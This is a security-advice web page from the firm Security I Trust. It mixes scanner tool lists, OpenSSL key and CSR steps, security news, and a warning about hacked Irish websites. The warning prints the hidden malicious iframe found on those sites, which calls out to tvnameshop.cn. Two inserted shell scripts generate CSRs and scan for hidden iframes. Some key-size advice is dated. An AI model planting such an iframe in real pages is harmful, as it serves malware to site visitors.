Web Security

Website security: is your website secure, and do you know how to secure it? At Security I Trust we provide free IT security advice on website security.

Top Website Security Vulnerability Tools

 

Need to check your website and see whether it is secure? Our list contains some of the top website vulnerability scanners:

  1. Nikto 2: open source web application security scanner
  2. Paros Proxy: used to evaluate the security of web applications
  3. Burp Suite: an integrated platform for attacking web applications
  4. WebScarab: a framework for analysing applications that communicate using the HTTP and HTTPS protocols
  5. Grendel-Scan: an open-source web application security testing tool
  6. WebInspect: a powerful web application scanner from HP
  7. Wikto: apparently borrowed its name from Nikto (a Unix-based assessment tool)
  8. Acunetix Web Vulnerability Scanner: Acunetix pioneered web application security scanning technology

In IIS 7, if you want to host two or more websites on one web server using different domain names and different SSL certificates, you need to assign more than one IP address to the server: each IIS website that you bind an SSL certificate to must have its own unique IP address.

Generating a Private Key and CSR for Linux Web Server

These are the instructions for generating a CSR on an Apache web server.
(Note: you need to be logged in as root for this process.)

OpenSSL is used to generate an RSA private key and a CSR file. You can also use it to generate self-signed certificates, which can be used for testing or internal usage.

OpenSSL should be installed in the /usr/local/ssl/bin directory.

The first step is to create your RSA private key. The key we create here will be a 1024-bit RSA key, encrypted using Triple-DES and stored in PEM format so that it is readable as ASCII text. We will use several files as random seed enhancers, which help make the key harder to predict. Text files that have been compressed with a utility such as gzip are good choices. The key is generated with the following command, where file1:file2:etc represents the random compressed files.


# openssl genrsa -des3 -rand file1:file2:file3:file4:file5 -out server.key 1024

You will be prompted for a pass-phrase. It is critical that you keep this pass-phrase secure. If you lose the key, or forget the pass-phrase, the certificate will be useless.
One issue with using a pass-phrase-protected private key is that Apache will ask for the pass-phrase every time the web server is started. This is not always convenient, as someone may not be around to type in the pass-phrase after a reboot or crash.
mod_ssl includes the ability to use an external program in place of the built-in pass-phrase dialog; however, this is not necessarily the most secure option either. The other option is to remove the Triple-DES encryption from the key, so that no pass-phrase needs to be typed in. If you remove the encryption from the private key it is critical that the file is readable by the root user only. If your system is ever compromised and a third party obtains your unencrypted private key, the corresponding certificate will need to be revoked.

This command will remove the pass-phrase from the key:


# openssl rsa -in server.key -out server.pem

Once the private key is generated you need to generate a CSR (Certificate Signing Request). There are two things you can do with the CSR:

  1. Send it to a Certificate Authority, who will verify the identity of the requestor and issue a signed certificate.
  2. Self-sign it, which will be demonstrated in the next section.

During generation of the CSR you will be prompted for several pieces of information; these are the X.509 attributes of the certificate. One of the prompts is for "Common Name", and it is important that this field is filled in with the fully qualified domain name of the server to be protected by SSL. If the URL of the website to be protected is https://www.webserver.com, enter www.webserver.com at this prompt.
This is the command to generate the CSR:

# openssl req -new -key server.key -out server.csr

You will be asked to enter the PEM pass-phrase, followed by the certificate attributes:

Country Name (2 letter code) [XX]:IE
State or Province Name (full name) []:Kilkenny
Locality Name (eg, city) [Default City]:Kilkenny
Organization Name (eg, company) [Default Company Ltd]: Security I Trust
Organizational Unit Name (eg, section) []:InfoSec
Common Name (eg, your name or your server's hostname) []: securityitrust.com
Email Address []:  support@your_email_address.com

Please enter the following 'extra' attributes to be sent with your certificate request
A challenge password []: I7nf9oS5
An optional company name []: Security I Trust

 

At this point you have two options:
1. Use your CSR to purchase a signed SSL certificate. If this is your plan, upload the CSR to the vendor's website and, when you have received the certificate from the vendor, install the private key and certificate on your web server.

2. Generate a self-signed certificate.
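The whole procedure above, run unattended, as an added example that is not from the original page: the interactive prompts are replaced by -passout, -passin and -subj, and it finishes with the checks a practitioner runs before uploading a CSR (that the key on disk really is encrypted, that the plaintext key is owner-readable only, that the CSR's Common Name is right, and that the CSR was built from this key). The pass-phrase, hostname and subject values are constructed; the key size is 2048 bits rather than the 1024 used in the text, and the -rand option is omitted because current OpenSSL releases seed themselves from the operating system.

```shell
#!/bin/sh
# Added example (not from the original page): the key/CSR procedure above run
# unattended, with the interactive prompts replaced by -passout/-passin/-subj.
# Assumptions: the openssl binary is on PATH; the pass-phrase, hostname and
# subject values are constructed for illustration. The key size used is 2048
# bits rather than the 1024 in the text.
set -eu

# Step 1: RSA private key encrypted with Triple-DES, as in the text, but with
# the pass-phrase supplied on the command line instead of at the prompt.
gen_encrypted_key() {   # $1 = work dir, $2 = pass-phrase
  openssl genrsa -des3 -passout "pass:$2" -out "$1/server.key" 2048 2>/dev/null
}

# Prints "yes" if the key file on disk is still pass-phrase protected.
key_is_encrypted() {    # $1 = work dir
  if grep -q ENCRYPTED "$1/server.key"; then echo yes; else echo no; fi
}

# Step 2: strip the pass-phrase (the "openssl rsa" command in the text) and
# immediately make the plaintext key readable by its owner only.
strip_passphrase() {    # $1 = work dir, $2 = pass-phrase
  openssl rsa -in "$1/server.key" -passin "pass:$2" -out "$1/server.pem" 2>/dev/null
  chmod 600 "$1/server.pem"
}

# Step 3: the CSR, with the X.509 attributes given via -subj; CN must be the
# fully qualified domain name of the server being protected.
gen_csr() {             # $1 = work dir, $2 = FQDN for the Common Name
  openssl req -new -key "$1/server.pem" \
    -subj "/C=IE/ST=Kilkenny/L=Kilkenny/O=Security I Trust/OU=InfoSec/CN=$2" \
    -out "$1/server.csr" 2>/dev/null
}

# Option 2 from the text: a self-signed certificate for testing or internal use.
self_sign() {           # $1 = work dir
  openssl x509 -req -days 365 -in "$1/server.csr" -signkey "$1/server.pem" \
    -out "$1/server.crt" 2>/dev/null
}

# Checks worth running before the CSR is uploaded to a CA.
csr_common_name() {     # prints the CN embedded in the CSR
  openssl req -in "$1/server.csr" -noout -subject | sed -n 's/.*CN *= *//p'
}

key_matches_csr() {     # prints "match" when the CSR was built from this key
  k=$(openssl rsa -in "$1/server.pem" -noout -modulus | openssl sha256)
  c=$(openssl req -in "$1/server.csr" -noout -modulus | openssl sha256)
  if [ "$k" = "$c" ]; then echo match; else echo mismatch; fi
}

key_mode() {            # prints the permission bits of the plaintext key
  stat -c '%a' "$1/server.pem" 2>/dev/null || stat -f '%Lp' "$1/server.pem"
}

run_all() {             # $1 = work dir, $2 = pass-phrase, $3 = FQDN
  gen_encrypted_key "$1" "$2"
  strip_passphrase "$1" "$2"
  gen_csr "$1" "$3"
  self_sign "$1"
}

# Usage: D=$(mktemp -d); run_all "$D" 'constructed-pass' www.example.com
#        csr_common_name "$D"; key_matches_csr "$D"; key_mode "$D"
```

The modulus comparison is the check that catches the most common mistake when installing a purchased certificate: the CSR (and therefore the certificate the CA returns) was generated from a different key than the one now on the server.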
 

  • Non-work related Internet surfing results in up to a 40% loss in productivity each year – Gartner Group
  • 85.6% of employees use office email for personal reasons – NFO Worldwide
  • 70% of all web traffic to Internet pornography sites occurs during work hours – Sex Tracker
  • 92% of online stock trading occurs from the workplace during work hours.
  • 64% of employees have received politically incorrect or offensive emails at work – Business Week
  • 30% of employees watch sports online while at work.
  • 24% of employees admit to shopping online while at work.
  • Employees use company Internet access to visit sites more frequently at work than they do at home because of the high-speed Internet access at work – Nielsen Ratings
  • 30 to 40% of Internet use in the workplace is not related to business – IDC Research
  • 37% of workers say they surf the Web constantly at work – Vault.com
  • 77.7% of major U.S. companies keep tabs on employees by checking their e-mail, Internet, phone calls, computer files, or by videotaping them at work – American Management Association
  • 63% of companies monitor workers' Internet connections and 47% store and review employee e-mail – American Management Association
  • 27% of companies say that they've fired employees for misuse of office e-mail or Internet connections, and 65% report some disciplinary measure for those offenses – American Management Association
     

Spotify has apologized for an attack that exposed users of the free version of its music streaming service in Europe to malware through tainted advertisements. The ads served content that attempted to infect users' machines with scareware. Spotify disabled third-party advertisements on Friday, March 25 after learning of the problem. The company isolated and removed the offending ad, and service was back to normal in the next few days.

Two UK ISPs are challenging the country's Digital Economy Act. They want the English High Court to determine the legislation's legality before the Digital Economy Act takes effect. The ISPs claim that this bill was rushed through Parliament just prior to the general election and therefore received "insufficient scrutiny;" there was not adequate time to hash out the bill's content or the implications of its provisions. The bill requires that ISPs disconnect persistent illegal file sharers from the Internet and allows copyright holders to block access to sites that host illegal content. The bill does have a measure that would require additional legislation and consultation before the disconnect provision could be implemented.

Europe's e-commerce directive established that ISPs are merely conduits and are not to be held liable for the traffic's content.


Google Chrome suspected of having Multiple Security Vulnerabilities

Affected version: Google Chrome prior to 5.0.375.99

Chrome is affected by multiple security vulnerabilities:

  • 4 of the vulnerabilities potentially involve memory corruption, so it is possible that some of them can be used for code execution.
  • 3 of the bugs specifically relate to Chrome's handling of SVG and PNG images and CSS style sheets.
  • The other one is related to Chrome's bidi (bidirectional text) algorithm.

Status: vendor confirmed, updates available

References: Vendor Home Page http://www.google.com

Google Chrome Stable Channel Update http://googlechromereleases.blogspot.com/2010/07/stable-channel-update.html

SecurityFocus BID http://www.securityfocus.com/bid/41334/

ALERT: THE HIDDEN DANGERS BEHIND YOUR FAVORITE SEARCH ENGINE. Hackers are exploiting search engines to infect your PCs and smart phones – do not let your company become the next victim. Join SANS for an educational webcast on May 26 – keynote by Peter Firstbrook, GARTNER.
Register here: http://www.sans.org/info/59023

According to various reports, in the past few days a large number of websites built with WordPress have been hacked. Unconfirmed reports by WPSecurityLock suggest that other PHP-based content management systems, such as the Zen Cart eCommerce solution, have also been targeted.

The hacked web pages appear to have been infected with scripts which not only install malware on users' systems, but also prevent browsers like Firefox and Google Chrome, which use Google's Safe Browsing API, from issuing an alert when users try to access the page. When Google's search bot encounters such a specially crafted page, the page responds by simply returning harmless code. This camouflage strategy takes advantage of the browser switch normally used by developers to return browser-specific code to suit functional variations in different browsers, such as Internet Explorer and Firefox.

Experts are still puzzled over which hole was actually exploited for the large-scale attack. The only thing that seems certain at this point is that the problem did not originate in WordPress itself, because if it had, considerably more pages would have been infected. It is still unknown which versions of WordPress are being attacked.

At Security I Trust we have noticed a large increase in the number of Irish websites being compromised by hackers. In the majority of cases the hackers have only inserted code into the home page of the website. Many Irish website owners have been completely unaware that their website was compromised, and only found out when their own PC had already been affected.

The following code has recently been appearing on the home page of many Irish websites:

<html><body><iframe src="http://tvnameshop.cn:8080/ts/in.cgi?pepsi19" width=12 height=12 style="visibility: hidden"></iframe></body></html>

The above iframe's URL uses a ".cn" domain to make you think that it is a Chinese hacking group, but from our investigation we have traced this link to a server located in Germany. This German server appears to reroute the connection to a server located in the Czech Republic.

What can website owners do?

If you are concerned about your website being a victim, open your web pages in a web browser, view the page source and search for any iframe code or any reference to tvnameshop.cn or fuckingl33t.eu. If you do not understand web code you are advised to ask a web programmer to assist you. To repair your website you need to remove the code that the hackers have added to it.
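The same check done over the files in a web root rather than one page at a time, as an added example that is not from the original page: it flags pages containing an iframe that is styled invisible or given a tiny width (the two tricks in the injected tag above), and separately lists every host the site's iframes load from so the owner can compare them against the domains the site is known to use. The three-page sample site and the host malicious.example are constructed stand-ins for the tvnameshop.cn tag shown on the page; the script assumes GNU or BSD grep and sed.

```shell
#!/bin/sh
# Added example (not from the original page): a file-level version of the check
# described above, for owners with shell access to their web root. The sample
# site and the host malicious.example are constructed stand-ins for the
# injected tag shown on the page.
set -eu

# Pages under $1 containing an <iframe> that is hidden (visibility:hidden or
# display:none) or whose width is at most two digits (12x12 in the injected tag).
scan_hidden_iframes() {
  grep -rliE --include='*.html' --include='*.htm' --include='*.php' \
    '<iframe[^>]*(visibility: *hidden|display: *none|width="?[0-9]{1,2}[^0-9])' \
    "$1" 2>/dev/null | sort
}

# Distinct host[:port] values that iframes under $1 load from, one per line,
# for review against the domains the site legitimately uses.
iframe_src_hosts() {
  grep -rhoiE --include='*.html' --include='*.htm' --include='*.php' \
    '<iframe[^>]*src="?https?://[^/"]+' "$1" 2>/dev/null \
    | sed -E 's#.*src="?https?://##' | sort -u
}

# Constructed sample site: one injected home page (same shape as the tag on the
# page, with a placeholder host), one legitimate visible embed, one clean page.
make_sample_site() {
  printf '%s\n' '<html><body><h1>Shop</h1><iframe src="http://malicious.example:8080/ts/in.cgi?x" width=12 height=12 style="visibility: hidden"></iframe></body></html>' > "$1/index.html"
  printf '%s\n' '<html><body><iframe src="https://video.example/embed/1" width="560" height="315"></iframe></body></html>' > "$1/about.html"
  printf '%s\n' '<html><body><p>Contact us</p></body></html>' > "$1/contact.html"
}

# Usage: D=$(mktemp -d); make_sample_site "$D"
#        scan_hidden_iframes "$D"   # lists only index.html
#        iframe_src_hosts "$D"      # malicious.example:8080 and video.example
```

Only index.html is reported by the first check; the legitimate 560x315 embed on about.html is not, while the host list still shows both origins so that an unfamiliar one stands out. A site that legitimately uses hidden iframes will need the pattern adjusted, and a clean scan is not proof of a clean site, since injected code can also live in PHP templates or the database rather than static files.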

So what are these hackers doing?

When your customers come to your website it will appear normal, but in the background, when your home page loads in the visitor's browser, the hacker's hidden code will also make a connection out to the hacker's server and run several hidden scripts against the visitor's PC. These hidden scripts could be used to steal information from the visitor's PC or even install malware or other tools on it. The primary danger for the website owner is that it will appear as if his website was responsible for the attack against the user.

Niall O’Farrell
Managing Director
www.securityitrust.com